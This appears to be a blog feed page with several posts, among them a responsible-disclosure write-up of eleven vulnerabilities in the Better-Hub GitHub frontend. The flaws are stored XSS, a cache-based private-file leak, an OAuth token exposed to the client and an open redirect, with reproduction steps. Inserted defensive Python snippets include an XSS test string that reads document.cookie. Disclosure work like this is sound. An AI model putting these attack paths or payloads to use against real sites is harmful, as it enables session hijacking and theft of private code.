Latest Posts (20 found)

MOOving to a self-hosted Bluesky PDS

Bluesky is a “Twitter clone” that runs on the AT Protocol. I have to be honest, I’d struggle to explain how atproto works. I think it’s similar to Nostr but, like, good? When atproto devs talk about The Atmosphere they sound like blockchain bros. The marketing needs consideration. Bluesky, however, is a lot of fun. It feels like early Twitter. Nobody cool uses Twitter anymore. It’s a cesspit of racists asking Gork to undress women.

Mastodon and Bluesky are the social platforms I use. I’ve always been tempted to self-host my own Mastodon instance, but the requirements are steep; I use the omg.lol server instead. Self-hosting the Bluesky PDS is much less demanding.

My setup includes: This is the host machine; I glued an NVMe onto the underside. All services run as Docker containers for easy security sandboxing. I say easy, but it took many painful years to master Docker. I have the Pi on a VLAN firewall because I’m extra paranoid.

I set up my Bluesky PDS using the official Docker container. It’s configured with environment variables and has a single data volume mounted. I back up that volume to my NAS.

I’ve put Caddy in front of the PDS container. Right now it just acts as a reverse proxy. This gives me flexibility later if I want to add access logs, rate limiting, or other plugins.

Booo! If you know a good European alternative, please let me know! The tunnel links Caddy to the outside world via Cloudflare to avoid exposing my home IP address. Cloudflare also adds an extra level of bot protection. The guides I followed suggest adding wildcard DNS for the tunnel. Cloudflare has shuffled the dashboard for the umpteenth time and I can’t figure out how. I think sub-domains are only used for user handles, e.g. . I use a different custom domain for my handle ( ) with a manual TXT record to verify.

Allowing the PDS to send emails isn’t strictly necessary. It’s useful for password resets, and I think it’ll send a code if I migrate PDS again.
I went through the hassle of adding my PDS domain to Proton Mail and followed their SMTP guide. This shows how the PDS environment variables are formatted. It took me forever to figure out where the username and password went.

PDS MOOver by Bailey Townsend is the tool that does the data migration. It takes your Bluesky password and probably sees your private key, so use at your own risk! I set up a new account to test it before I YOLO’d my main. MOOve successful!

I still log in at but I now select “custom account provider” and enter my PDS domain. SkyTools has a tool that confirms it. Bluesky Debug can check handles are verified correctly. PDSls.dev is a neat atproto explorer.

I cross-referenced the following guides for help: Most of the Cloudflare stuff is outdated because Cloudflare rolls dice every month.

Bluesky is still heavily centralised, but the atproto layer allows anyone to control their own data. I like doing that on principle. I don’t like maintenance, but I’ve heard that’s minimal for a PDS. Supposedly it’s possible to migrate back to Bluesky’s PDS if I get bored. I’m tempted to build something in The Atmosphere. Any ideas?

Thanks for reading! Follow me on Mastodon and Bluesky. Subscribe to my Blog and Notes or Combined feeds.

Notes on Self Hosting a Bluesky PDS Alongside Other Services
Self-host federated Bluesky instance (PDS) with CloudFlare Tunnel
Host a PDS via a Cloudflare Tunnel
Self-hosting Bluesky PDS
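On the SMTP step that took forever: the PDS reads its mail settings from a single connection URL (the variable is PDS_EMAIL_SMTP_URL in the official compose setup, as I remember it), and the username and password go inside that URL, percent-encoded. A small Python sketch of the format; the hostname and credentials below are placeholders, so check them against Proton's own guide:

```python
from urllib.parse import quote

def smtp_url(user, password, host, port=465):
    """Build an smtps:// connection URL with percent-encoded
    credentials; characters like '@' or '/' in the username or
    password must be escaped or the URL won't parse."""
    return f"smtps://{quote(user, safe='')}:{quote(password, safe='')}@{host}:{port}/"

# Hypothetical values; Proton Mail issues a dedicated SMTP token,
# and the host/port here are placeholders to verify against their docs.
print(smtp_url("pds@example.com", "p@ss/word", "smtp.example.com"))
# smtps://pds%40example.com:p%40ss%2Fword@smtp.example.com:465/
```

The non-obvious part is that the `@` in the username must become `%40`, otherwise the URL parser treats everything after it as the host.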


Step aside, phone: week 3

Three-quarters of the way through this “challenge”, and the findings are mostly the same. Phone usage is very easy to keep in check if you decide to put your mind to it. The past seven days have been very similar to the previous seven, and that’s good, since this type of phone usage needs to become the new normal. Contrary to the previous week, this time it was the first half of the week that saw higher usage, and that was mostly due to a few long Telegram sessions late in the day on Monday and Tuesday. 44 of the 54 minutes logged on Monday, and 32 of the 45 logged on Tuesday, were spent on Telegram. On Wednesday, only 26 of the 46 minutes went to Telegram; the rest of the usage was work-related, since I had to do a few phone calls and test a couple of things on mobile Safari. The second half of the week saw a lot less phone time, but I did have to spend a lot more time at my computer, taking care of client stuff, and that’s why I barely picked up the phone. Which is fine. I still have not consumed content on the phone, three weeks in. That’s awesome, and I want it to stay that way. Again, very pleased with how this month-long experiment is going, and I do have some takeaways, but I’ll wait until next Sunday to share them.

Thank you for keeping RSS alive. You're awesome. Email me :: Sign my guestbook :: Support for 1$/month :: See my generous supporters :: Subscribe to People and Blogs

devansh Today

Hacking Better-Hub

Better-Hub ( better-hub.com ) is an alternative GitHub frontend — a richer, more opinionated UI layer built on Next.js that sits on top of the GitHub API. It lets developers browse repositories, view issues, pull requests, code blobs, and repository prompts, while authenticating via GitHub OAuth. Because Better-Hub mirrors GitHub content inside its own origin, any unsanitized rendering of user-controlled data becomes significantly more dangerous than it would be on a static page — it has access to session tokens, OAuth credentials, and the authenticated GitHub API. That attack surface is exactly what I set out to explore.

Description
The repository README is fetched from GitHub, piped through with and enabled — with zero sanitization — then stored in the state and rendered via in . Because the README is entirely attacker-controlled, any repository owner can embed arbitrary JavaScript that executes in every viewer's browser on better-hub.com.
Steps to Reproduce
Session hijacking via cookie theft, credential exfiltration, and full client-side code execution in the context of better-hub.com. Chains powerfully with the GitHub OAuth token leak (see vuln #10).

Description
Issue descriptions are rendered with the same vulnerable pipeline: with raw HTML allowed and no sanitization. The resulting is inserted directly via inside the thread entry component, meaning a malicious issue body executes arbitrary script for every person who views it on Better-Hub.
Steps to Reproduce
Arbitrary JavaScript execution for anyone viewing the issue through Better-Hub. Can be used for session hijacking, phishing overlays, or CSRF-bypass attacks.

Description
Pull request bodies are fetched from GitHub and processed through with / and no sanitization pass, then rendered unsafely. An attacker opening a PR with an HTML payload in the body causes XSS to fire for every viewer of that PR on Better-Hub.
Steps to Reproduce
Stored XSS affecting all viewers of the PR.
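The shared root cause of the three issues above is rendering attacker-controlled markup as raw HTML. A minimal Python illustration of the difference escaping makes (Better-Hub itself is a Next.js app, where the realistic fix is an HTML sanitizer such as DOMPurify or rehype-sanitize; `html.escape` here is just a stand-in to show the principle):

```python
import html

def render_untrusted(markup):
    """Escape untrusted markup so it displays as inert text instead
    of executing; a stand-in for a real HTML sanitizer."""
    return html.escape(markup)

payload = '<img src=x onerror="alert(document.cookie)">'
safe = render_untrusted(payload)
assert "<img" not in safe  # no live tag survives escaping
print(safe)
# &lt;img src=x onerror=&quot;alert(document.cookie)&quot;&gt;
```

Escaping turns the payload into visible text; a proper sanitizer instead keeps benign formatting while stripping script-capable constructs, which is what a markdown renderer actually wants.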
Particularly impactful in collaborative projects where multiple team members review PRs.

Description
The same unsanitized pipeline applies to PR comments. Any GitHub user who can comment on a PR can inject a stored XSS payload that fires for every Better-Hub viewer of that conversation thread.
Steps to Reproduce
A single malicious commenter can compromise every reviewer's session on the platform.

Description
The endpoint proxies GitHub repository content and determines the from the file extension in the query parameter. For files it sets and serves the content inline (no ). An attacker can upload a JavaScript-bearing SVG to any GitHub repo and share a link to the proxy endpoint — the victim's browser executes the script within 's origin.
Steps to Reproduce
Reflected XSS with a shareable, social-engineered URL. No interaction with a real repository page is needed — just clicking a link is sufficient. Easily chained with the OAuth token leak for account takeover.

Description
When viewing code files larger than 200 KB, the application hits a fallback render path in that outputs raw file content via without any escaping. An attacker can host a file exceeding the 200 KB threshold containing an XSS payload — anyone browsing that file on Better-Hub gets the payload executed.
Steps to Reproduce
Any repository owner can silently weaponize a large file. Because code review is often done on Better-Hub, this creates a highly plausible attack vector against developers reviewing contributions.

Description
The function reads file content from a shared Redis cache . Cache entries are keyed by repository path alone — not by requesting user. The field is marked as shareable, so once any authorized user views a private file through the handler or the blob page, its contents are written to Redis under a path-only key. Any subsequent request for the same path — from any user, authenticated or not — is served directly from cache, completely bypassing GitHub's permission checks.
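The cache-deception flaw above reduces to a few lines. A toy Python model (a dict stands in for Redis; all names are illustrative, not Better-Hub's actual code): the broken version consults the cache before checking authorization and keys entries by path only, so one authorized view poisons the cache for everyone.

```python
# A dict stands in for the shared Redis cache.
cache = {}

def fetch_broken(user, path, authorized):
    """Mirrors the flaw: the cache key ignores who is asking."""
    if path in cache:                    # BUG: keyed by path alone
        return cache[path]
    if user not in authorized:
        return None
    cache[path] = f"contents of {path}"  # simulated GitHub fetch
    return cache[path]

def fetch_fixed(user, path, authorized):
    """Authorization first, and the key includes the requester."""
    if user not in authorized:
        return None
    key = f"{user}:{path}"
    if key not in cache:
        cache[key] = f"contents of {path}"
    return cache[key]

authorized = {"owner"}
fetch_broken("owner", "private/secret.env", authorized)   # warms the cache
leak = fetch_broken("anonymous", "private/secret.env", authorized)
print(leak is not None)  # True: private content served without auth
print(fetch_fixed("anonymous", "private/secret.env", authorized))  # None
```

An alternative fix keeps a shared cache but re-checks authorization on every hit; either way, a cache lookup must never substitute for the permission check.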
Steps to Reproduce
Complete confidentiality breach of private repositories. Any file that has ever been viewed by an authorized user is permanently exposed to unauthenticated requests. This includes source code, secrets in config files, private keys, and any other sensitive repository content.

Description
A similar cache-keying problem affects the issue page. When an authorized user views a private repo issue on Better-Hub, the issue's full content is cached and later embedded in Open Graph meta properties of the page HTML. A user who lacks repository access — and sees the "Unable to load repository" error — can still read the issue content by inspecting the page source, where it leaks in the meta tags served from cache.
Steps to Reproduce
Private issue contents — potentially including bug reports, credentials in descriptions, or internal discussion — are accessible to any unauthenticated party who knows or guesses the URL.

Description
Better-Hub exposes a Prompts feature tied to repositories. For private repositories, the prompt data is included in the server-rendered page source even when the requestor does not have repository access. The error UI correctly shows "Unable to load repository," but the prompt content is already serialized into the HTML delivered to the browser.
Steps to Reproduce
Private AI prompts — which may contain internal instructions, proprietary workflows, or system prompt secrets — leak to unauthenticated users.

Description
returns a session object that includes . This session object is passed as props directly to client components ( , , etc.). Next.js serializes component props and embeds them in the page HTML for hydration, meaning the raw GitHub access token is present in the page source and accessible to any JavaScript running on the page — including scripts injected via any of the XSS vulnerabilities above. The fix is straightforward: strip from the session object before passing it as props to client components.
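The token-leak fix just described (keep the credential out of anything serialized into client props) can be sketched in a few lines. Python here purely for illustration; the field names are assumptions, not Better-Hub's actual session shape:

```python
def client_safe_session(session):
    """Drop server-only fields before the session is serialized
    into client component props (field names are assumptions)."""
    SERVER_ONLY = {"accessToken", "refreshToken"}
    return {k: v for k, v in session.items() if k not in SERVER_ONLY}

session = {"login": "octocat", "accessToken": "gho_secret"}
print(client_safe_session(session))  # {'login': 'octocat'}
```

The general rule: the credential stays server-side, and any API call that needs it goes through a server route rather than the browser.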
Token usage should remain server-side only. When chained with any XSS in this report, an attacker can exfiltrate the victim's GitHub OAuth token and make arbitrary GitHub API calls on their behalf — reading private repos, writing code, managing organizations, and more. This elevates every XSS in this report from session hijacking to full GitHub account takeover.

Description
The home page redirects authenticated users to the destination specified in the query parameter with no validation or allow-listing. An attacker can craft a login link that silently redirects the victim to an attacker-controlled domain immediately after they authenticate.
Steps to Reproduce
Phishing attacks exploiting the trusted better-hub.com domain. Can be combined with OAuth token flows for session fixation attacks, or used to redirect users to convincing fake login pages post-authentication.

All issues were reported directly to the Better-Hub team. The team was responsive and attempted rapid remediation.

What is Better-Hub?
The Vulnerabilities
01. Unsanitized README → XSS
02. Issue Description → XSS
03. Stored XSS in PR Bodies
04. Stored XSS in PR Comments
05. Reflected XSS via SVG Image Proxy
06. Large-File XSS (>200 KB)
07. Cache Deception — Private File Access
08. Authz Bypass via Issue Cache
09. Private Repo Prompt Leak
10. GitHub OAuth Token Leaked to Client
11. Open Redirect via Query Parameter
Disclosure Timeline

Create a GitHub repository with the following content in : View the repository at and observe the XSS popup.
Create a GitHub issue with the following in the body: Navigate to the issue via to trigger the payload.
Open a pull request whose body contains: View the PR through Better-Hub to observe the XSS popup.
Post a PR comment containing: View the comment thread via Better-Hub to trigger the XSS.
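On vuln 05: the SVG proxy is only exploitable because script-capable content is served inline from the app's own origin. A hedged Python sketch of header selection for such a proxy (function and constant names are illustrative, not Better-Hub's actual code):

```python
# Extensions whose content can execute script when rendered inline.
ACTIVE_TYPES = {".svg", ".html", ".xhtml", ".xml"}

def proxy_headers(filename):
    """Pick response headers for proxied repository files so that
    script-capable formats are downloaded, never rendered inline."""
    ext = "." + filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    headers = {"X-Content-Type-Options": "nosniff"}
    if ext in ACTIVE_TYPES:
        # Force download instead of inline rendering in the app's origin.
        headers["Content-Type"] = "application/octet-stream"
        headers["Content-Disposition"] = "attachment"
    else:
        headers["Content-Disposition"] = "inline"
    return headers

print(proxy_headers("logo.svg")["Content-Disposition"])   # attachment
print(proxy_headers("photo.png")["Content-Disposition"])  # inline
```

Serving user files from a separate sandbox domain (as GitHub itself does with raw.githubusercontent.com) is the stronger variant of the same idea.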
Create an SVG file in a public GitHub repo with content: Direct the victim to:

Create a file named containing the payload, padded to exceed 200 KB: Browse to the file on Better-Hub at . The XSS fires immediately.

Create a private repository and add a file called . As the repository owner, navigate to the following URL to populate the cache: Open the same URL in an incognito window or as a completely different user. The private file content is served — no authorization required.

Create a private repo and create an issue with a sensitive body. Open the issue as an authorized user: Open the same URL in a different session (no repo access). While the access-error UI is shown, view the page source — issue details appear in the tags.

Create a private repository and create a prompt in it. Open the prompt URL as an unauthorized user: View the page source — prompt details are present in the HTML despite the access-denied UI.

Log in to Better-Hub with GitHub credentials. Navigate to: You are immediately redirected to .
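For the open redirect (vuln 11), the standard fix is to accept only same-origin relative paths as the post-login destination. A minimal Python sketch; the parameter name and policy are assumptions for illustration, not Better-Hub's actual code:

```python
from urllib.parse import urlparse

def safe_next(next_param, fallback="/"):
    """Allow only same-origin relative paths as the post-login
    redirect target (parameter name assumed)."""
    if not next_param:
        return fallback
    parts = urlparse(next_param)
    # Reject absolute URLs, scheme-relative //host, and backslash tricks.
    if parts.scheme or parts.netloc or "\\" in next_param:
        return fallback
    if not next_param.startswith("/"):
        return fallback
    return next_param

print(safe_next("/repo/issues/1"))        # /repo/issues/1
print(safe_next("https://evil.example"))  # /
print(safe_next("//evil.example"))        # /
```

The scheme-relative `//evil.example` case is the one naive `startswith("/")` checks miss, since browsers resolve it against the current scheme and navigate off-origin.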


Notes on Lagrange Interpolating Polynomials

Polynomial interpolation is a method of finding a polynomial function that fits a given set of data perfectly. More concretely, suppose we have a set of n+1 distinct points [1] : (x_0,y_0), (x_1,y_1)\cdots(x_n,y_n) And we want to find the polynomial coefficients \{a_0\cdots a_n\} such that: p(x)=a_0+a_1x+a_2x^2+\cdots+a_nx^n Fits all our points; that is p(x_0)=y_0 , p(x_1)=y_1 etc. This post discusses a common approach to solving this problem, and also shows why such a polynomial exists and is unique. When we assign all points (x_i, y_i) into the generic polynomial p(x) , we get: a_0+a_1x_i+a_2x_i^2+\cdots+a_nx_i^n=y_i \quad (i=0\dots n) We want to solve for the coefficients a_i . This is a linear system of equations that can be represented by the following matrix equation: \begin{pmatrix}1 & x_0 & x_0^2 & \cdots & x_0^n\\ \vdots & & & & \vdots\\ 1 & x_n & x_n^2 & \cdots & x_n^n\end{pmatrix}\begin{pmatrix}a_0\\ \vdots\\ a_n\end{pmatrix}=\begin{pmatrix}y_0\\ \vdots\\ y_n\end{pmatrix} The matrix on the left is called the Vandermonde matrix . This matrix is known to be invertible (see Appendix for a proof); therefore, this system of equations has a single solution that can be calculated by inverting the matrix. In practice, however, the Vandermonde matrix is often numerically ill-conditioned, so inverting it isn’t the best way to calculate exact polynomial coefficients. Several better methods exist. Lagrange interpolation polynomials emerge from a simple, yet powerful idea. Let’s define the Lagrange basis functions l_i(x) ( i \in [0, n] ) as follows, given our points (x_i, y_i) : l_i(x_j)=1 \text{ if } j=i, \text{ and } 0 \text{ if } j\neq i In words, l_i(x) is constrained to 1 at x_i and to 0 at all other x_j . We don’t care about its value at any other point. The linear combination: p(x)=\sum_{i=0}^{n}y_i l_i(x) is then a valid interpolating polynomial for our set of n+1 points, because it’s equal to y_i at each x_i (take a moment to convince yourself this is true). How do we find l_i(x) ? The key insight comes from studying the following function: l'_i(x)=\prod_{j\neq i}(x-x_j) This function has terms (x-x_j) for all j\neq i . It should be easy to see that l'_i(x) is 0 at all x_j when j\neq i . What about its value at x_i , though? We can just assign x_i into l'_i(x) to get: l'_i(x_i)=\prod_{j\neq i}(x_i-x_j) And then normalize l'_i(x) , dividing it by this (constant) value. We get the Lagrange basis function l_i(x) : l_i(x)=\prod_{j\neq i}\frac{x-x_j}{x_i-x_j} Let’s use a concrete example to visualize this.
Suppose we have the following set of points we want to interpolate: (1,4), (2,2), (3,3) . We can calculate l'_0(x) , l'_1(x) and l'_2(x) , and get the following: Note where each l'_i(x) intersects the x-axis. These functions have the right values at all x_{j\neq i} . If we normalize them to obtain l_i(x) , we get these functions: Note that each polynomial is 1 at the appropriate x_i and 0 at all the other x_{j\neq i} , as required. With these l_i(x) , we can now plot the interpolating polynomial p(x)=\sum_{i=0}^{n}y_i l_i(x) , which fits our set of input points: We’ve just seen that the linear combination of Lagrange basis functions: p(x)=\sum_{i=0}^{n}y_i l_i(x) is a valid interpolating polynomial for a set of n+1 distinct points (x_i, y_i) . What is its degree? Since the degree of each l_i(x) is n , the degree of p(x) is at most n . We’ve just derived the first part of the Polynomial interpolation theorem : Polynomial interpolation theorem : for any n+1 data points (x_0,y_0), (x_1, y_1)\cdots(x_n, y_n) \in \mathbb{R}^2 where no two x_j are the same, there exists a unique polynomial p(x) of degree at most n that interpolates these points. We’ve demonstrated existence and degree, but not yet uniqueness . So let’s turn to that. We know that p(x) interpolates all n+1 points, and its degree is at most n . Suppose there’s another such polynomial q(x) . Let’s construct: r(x)=p(x)-q(x) What do we know about r(x) ? First of all, its value is 0 at all our x_i , so it has n+1 roots . Second, we also know that its degree is at most n (because it’s the difference of two polynomials of such degree). These two facts are a contradiction. No non-zero polynomial of degree \leq n can have n+1 roots (a basic algebraic fact related to the Fundamental theorem of algebra ). So r(x) must be the zero polynomial; in other words, our p(x) is unique \blacksquare . Note the implication of uniqueness here: given our set of n+1 distinct points, there’s only one polynomial of degree \leq n that interpolates it.
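The worked example above is easy to check in a few lines of Python. A sketch (not from the original post) using exact rational arithmetic, built directly from the basis formula l_i(x) = prod over j != i of (x - x_j)/(x_i - x_j):

```python
from fractions import Fraction

def lagrange(points):
    """Build p(x) = sum_i y_i * l_i(x) from the Lagrange basis."""
    xs = [Fraction(x) for x, _ in points]
    ys = [Fraction(y) for _, y in points]

    def p(x):
        x = Fraction(x)
        total = Fraction(0)
        for i, xi in enumerate(xs):
            # l_i(x): product over j != i of (x - x_j) / (x_i - x_j)
            li = Fraction(1)
            for j, xj in enumerate(xs):
                if j != i:
                    li *= (x - xj) / (xi - xj)
            total += ys[i] * li
        return total

    return p

# The post's example points:
p = lagrange([(1, 4), (2, 2), (3, 3)])
print([p(x) for x in (1, 2, 3)])  # recovers the y values 4, 2, 3
print(p(0))                       # 9, consistent with p(x) = 3/2 x^2 - 13/2 x + 9
```

Uniqueness means any other correct method, such as solving the Vandermonde system, must yield exactly the same polynomial.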
We can find its coefficients by inverting the Vandermonde matrix, by using Lagrange basis functions, or any other method [2] . The set P_n(\mathbb{R}) consists of all real polynomials of degree \leq n . This set - along with addition of polynomials and scalar multiplication - forms a vector space . We called l_i(x) the "Lagrange basis" previously, and they do - in fact - form an actual linear algebra basis for this vector space. To prove this claim, we need to show that Lagrange polynomials are linearly independent and that they span the space. Linear independence : we have to show that s(x)=\sum_{i=0}^{n}a_i l_i(x)=0 implies a_i=0 \quad \forall i . Recall that l_i(x) is 1 at x_i , while all other l_j(x) are 0 at that point. Therefore, evaluating s(x) at x_0 , we get: s(x_0)=a_0=0 Similarly, we can show that a_i is 0, for all i \blacksquare . Span : we’ve already demonstrated that the linear combination of l_i(x) : p(x)=\sum_{i=0}^{n}y_i l_i(x) is a valid interpolating polynomial for any set of n+1 distinct points. Using the polynomial interpolation theorem , this is the unique polynomial interpolating this set of points. In other words, for every q(x)\in P_n(\mathbb{R}) , we can identify any set of n+1 distinct points it passes through, and then use the technique described in this post to find the coefficients of q(x) in the Lagrange basis. Therefore, the set l_i(x) spans the vector space \blacksquare . Previously we’ve seen how to use the \{1, x, x^2, \dots x^n\} basis to write down a system of linear equations that helps us find the interpolating polynomial. This results in the Vandermonde matrix . Using the Lagrange basis, we can get a much nicer matrix representation of the interpolation equations. Recall that our general polynomial using the Lagrange basis is: p(x)=\sum_{i=0}^{n}a_i l_i(x) Let’s build a system of equations for each of the n+1 points (x_i,y_i) . For x_0 : p(x_0)=\sum_{i=0}^{n}a_i l_i(x_0)=y_0 By definition of the Lagrange basis functions, all l_i(x_0) where i\neq 0 are 0, while l_0(x_0) is 1. So this simplifies to: p(x_0)=a_0 But the value at node x_0 is y_0 , so we’ve just found that a_0=y_0 .
We can produce similar equations for the other nodes as well, p(x_1)=a_1 , etc. In matrix form: \begin{pmatrix}1 & & \\ & \ddots & \\ & & 1\end{pmatrix}\begin{pmatrix}a_0\\ \vdots\\ a_n\end{pmatrix}=\begin{pmatrix}y_0\\ \vdots\\ y_n\end{pmatrix} We get the identity matrix; this is another way to trivially show that a_0=y_0 , a_1=y_1 and so on. Given some numbers \{x_0 \dots x_n\} , a matrix of this form: V=\begin{pmatrix}1 & x_0 & x_0^2 & \cdots & x_0^n\\ \vdots & & & & \vdots\\ 1 & x_n & x_n^2 & \cdots & x_n^n\end{pmatrix} is called the Vandermonde matrix. What’s special about a Vandermonde matrix is that we know it’s invertible when the x_i are distinct. This is because its determinant is known to be non-zero . Moreover, its determinant is [3] : \det(V)=\prod_{0\leq i<j\leq n}(x_j-x_i) Here’s why. To get some intuition, let’s consider some small-rank Vandermonde matrices. Starting with a 2-by-2: \det\begin{pmatrix}1 & x_0\\ 1 & x_1\end{pmatrix}=x_1-x_0 Let’s try 3-by-3 now: \det\begin{pmatrix}1 & x_0 & x_0^2\\ 1 & x_1 & x_1^2\\ 1 & x_2 & x_2^2\end{pmatrix} We can use the standard way of calculating determinants to expand from the first row: (x_1x_2^2-x_2x_1^2)-x_0(x_2^2-x_1^2)+x_0^2(x_2-x_1) Using some algebraic manipulation, it’s easy to show this is equivalent to: (x_1-x_0)(x_2-x_0)(x_2-x_1) For the full proof, let’s look at the generalized n+1 -by- n+1 matrix again: Recall that subtracting a multiple of one column from another doesn’t change a matrix’s determinant. For each column k>1 , we’ll subtract the value of column k-1 multiplied by x_0 from it (this is done on all columns simultaneously). The idea is to make the first row all zeros after the very first element: Now we factor out x_1-x_0 from the second row (after the first element), x_2-x_0 from the third row and so on, to get: Imagine we erase the first row and first column of this transformed matrix. We’ll call the resulting matrix W . Because the first row of the transformed matrix is all zeros except the first element, we have: \det(V)=\det(W) Note that the first row of W has a common factor of x_1-x_0 , so when calculating \det(W) , we can move this common factor out. Same for the common factor x_2-x_0 of the second row, and so on. Overall, we can write: \det(V)=\prod_{i=1}^{n}(x_i-x_0)\cdot\det(V') But the smaller matrix V' is just the Vandermonde matrix for \{x_1 \dots x_n\} . If we continue this process by induction, we’ll get: \det(V)=\prod_{0\leq i<j\leq n}(x_j-x_i) If you’re interested, the Wikipedia page for the Vandermonde matrix has a couple of additional proofs.
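The determinant identity is easy to sanity-check numerically. A pure-Python sketch (not from the original post) comparing det(V) against the product formula; Laplace expansion is exponential but fine at this size:

```python
from fractions import Fraction
from itertools import combinations

def det(m):
    """Determinant via Laplace expansion along the first row."""
    n = len(m)
    if n == 1:
        return m[0][0]
    total = Fraction(0)
    for k in range(n):
        minor = [row[:k] + row[k + 1:] for row in m[1:]]
        total += (-1) ** k * m[0][k] * det(minor)
    return total

def vandermonde(xs):
    """Rows (1, x_i, x_i^2, ..., x_i^n) for each node x_i."""
    n = len(xs)
    return [[Fraction(x) ** p for p in range(n)] for x in xs]

xs = [0, 1, 3, 4]
lhs = det(vandermonde(xs))
rhs = Fraction(1)
for (i, xi), (j, xj) in combinations(list(enumerate(xs)), 2):
    rhs *= xj - xi   # product over pairs with i < j

print(lhs, rhs)  # both equal 72 for these nodes
assert lhs == rhs
```

Using exact fractions sidesteps the ill-conditioning mentioned earlier; with floats, even modest node sets make the direct determinant drift away from the product formula.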

iDiallo Today

“How old are you?” Asked the OS

A new law passed in California requires every operating system to collect the user's age at account creation time. The law is AB-1043, and it was passed in October of 2025. How does it work? Does it apply to offline systems? When I set up my Raspberry Pi at home, is this enforced? What if I give an incorrect age, am I breaking the law now? What if I set my account correctly, but then my kids use the device? What happens?

There is no way to enforce this law, but I suspect that's not the point. It's similar to statements you find in IRS documents. The IRS requires you to report all income from illegal activities, such as bribes and scams. Obviously, if you are getting a bribe, you wouldn't report it, but by not reporting it you are breaking additional laws that can be used to get you prosecuted.

When you don't report your age to your OS, whether it's a Windows device or a Tamagotchi, you are breaking the law. It's not enforced, of course, but when you are suspected of any other crime, you can be arrested for the age violation first, then prosecuted for something else. What a world we live in.


Launch Now

Inside us are two wolves. One wolf wants to craft, polish and refine – make things of exceptional quality. The other wolf wants to move fast and get feedback now. The two wolves don’t always get along. For years, I’ve balanced this by working toward exceptional products but constantly collecting private feedback along the way. Then, once we’ve built something excellent, something worthy of attention, we launch it to the world with appropriate fanfare. Videos, marketing campaigns, polished onboarding, and so on. “Here’s something worth trying, we think you’ll really like it.” This totally works. At least, it works as a path to eventually ship high-quality software. Polished, usable, even delightful software. But when it comes to building something people will pay for, it’s neither reliable nor fast. Our first product at Forestwalk was a developer tool – a platform for building and running evaluations of LLM-powered apps . We learned a ton building it, but after a few months – as we approached our first pilot projects – feedback from demos and potential first customers convinced us that this was the wrong path. It was more likely to lead us into a lifestyle business than something big. So we pivoted. We spent a few weeks building a prototype a week, showing demos, doing customer research, and found a second promising product path. Our second product was a productivity tool – a work assistant that could capture, organize, and rationalize teams’ tasks . We learned a ton building it, but after a few months – as we approached a public beta – feedback from private testers and our investors convinced us that this was the wrong path. It was more likely to lead us into a lifestyle business than something big. So we pivoted. The third time purports to be the charm. But at the same time, doing the same thing over and over typically gets the same results. We need to build something profoundly useful, something people really want. 
We can’t keep hiding away, sending out private demos and prototypes, not fully shipping anything! So, we decided to push harder into the discomfort of showing our work early. Just before Christmas, we decided to commit to something and work towards getting it shipped. This third product is codenamed Cedarloop 1 . It’s a realtime meeting agent. Unlike AIs that passively listen in to meetings and just write up notes after the fact, Cedar joins calls and uses “voice in, visuals out” to screen-share useful observations and perform routine tasks live during a Google Meet or Zoom meeting. The vision is to build a kind of agentic PM assistant. It can respond within a second of you talking 2 , which – when it works – feels like magic. We’ve been learning a lot building it. Recently, we started working with an excellent designer here in Vancouver who was keen to get going. I’d like to do some user testing. What do people say when you let them try it? Well, obviously it’s so early right now. They won’t like it. The inference and onboarding need more work. But we’ve been doing research about problems, needs, willingness to pay, and things like that. Sure… but we should also let people try it. What if we launched now? Well, obviously we can’t launch now . I mean… obviously. Launching now would be embarrassing. It’s not my brand to launch something publicly that’s not ready. On the other hand… I keep a printed copy of Y Combinator’s list of essential startup advice on my desk. And if you know YC, you’ll know that the first point of advice is “Launch now”. Only last month I was interviewing Brett Huneycutt, Wealthsimple’s co-founder . He had a lot of great stories, but one that sticks out is that even as a $10B company, they prioritize launching “now”, for as close as they can get to that definition. It’s not just about speed: a rapid feedback loop is a core ingredient in getting to quality. So we launched now. 
As of today, people can check out our research-preview realtime meeting agent at Cedarloop.ai . With luck, they’ll report issues, inform what we should prioritize next, and tell us what problems they’d love to have automated away. We’re only a few hours in, and yep – people are reporting issues. Linear integration had an OAuth issue. Login didn’t work in social-media webviews. We’ve been so focused on the desktop experience that we’ve let the mobile layout get janky. This is embarrassing! But also, there’s signal. People are trying the Linear integration. Our desktop-focused app is being discovered on mobile. Folks care enough to click at all. And in a week or so, we’ll have a smoother onboarding flow than we would have gotten to with weeks of private user tests. So it’s worth the pain. We’re going to take the feedback, follow the signal, learn and re-learn, and do better. We’ll use it to forge the best damn live agent ever – or, if the feedback peters out, we’ll know we’re on the wrong path, and find the right one. In the meantime, there’s a lot to do. 3 Back to work!

1. This is not a good name yet. For example, sometimes iOS mishears “Hey Cedar” as “Hey Siri”. But part of our move-fast strategy is to worry more about names once we’ve proven something has traction. At that point, we’ll put in the work to give it the right name – and eventually rename the company after it. ↩

2. It’s fascinating how much you can do to get LLM response times down. Our first prototype often took over 8000ms to respond, which doesn’t feel live at all. Once we got it under ~1200ms, voice-in-vision-out suddenly felt alive – a step change. We have a lot of work planned to get Cedarloop even faster and much more reliable, which I’m keen to write about when I can. ↩

3. Speaking of having a lot to do: if you’re an experienced product-minded developer in Vancouver who would be excited to iterate and build out realtime agents using LLMs and TypeScript, we’re hiring a Founding Engineer . Just sayin’. ↩

iDiallo Yesterday

That's it, I'm cancelling my ChatGPT

Just like everyone, I read Sam Altman's tweet about joining the so-called Department of War, to use ChatGPT on DoW classified networks. As others have pointed out, this is the entry point for mass surveillance and using the technology for weapons deployment. I wrote before that we had the infrastructure for mass surveillance in place already, we just needed an enabler. This is the enabler. This comes right after Anthropic's CEO wrote a public letter stating their refusal to work with the DoW under their current terms. Now Anthropic has been declared a public risk by the President and banned from every government system.

Large language models have become ubiquitous. You can't say you don't use them because they power every tech imaginable. If you search the web, they write a summary for you. If you watch YouTube, one appears right below the video. There's a Gemini button on Chrome, there's Copilot on Edge and every Microsoft product. There it is in your IDE, in Notepad, in MS Paint. You can't escape it. Switching from one LLM to the next makes minimal to no difference for everyday use. If you have a question you want answered or a document to summarize, your local Llama will do the job just fine. If you want to compose an email or proofread your writing, there's no need to reach for the state of the art, any model will do. For reviewing code, DeepSeek will do as fine a job as any other model.

[Image: a good use of ChatGPT's image generator.]

All this to say, ChatGPT doesn't have a moat. If it's your go-to tool, switching away from it wouldn't make much of a difference. At this point, I think the difference is psychological. For example, my wife once told me she only ever uses Google and can't stand any other search engine. What she didn't know was that she had been using Bing on her device for years. She had never noticed, because it was the default. When I read the news about OpenAI, I was ready to close my account. The only problem is, well, I never use ChatGPT.
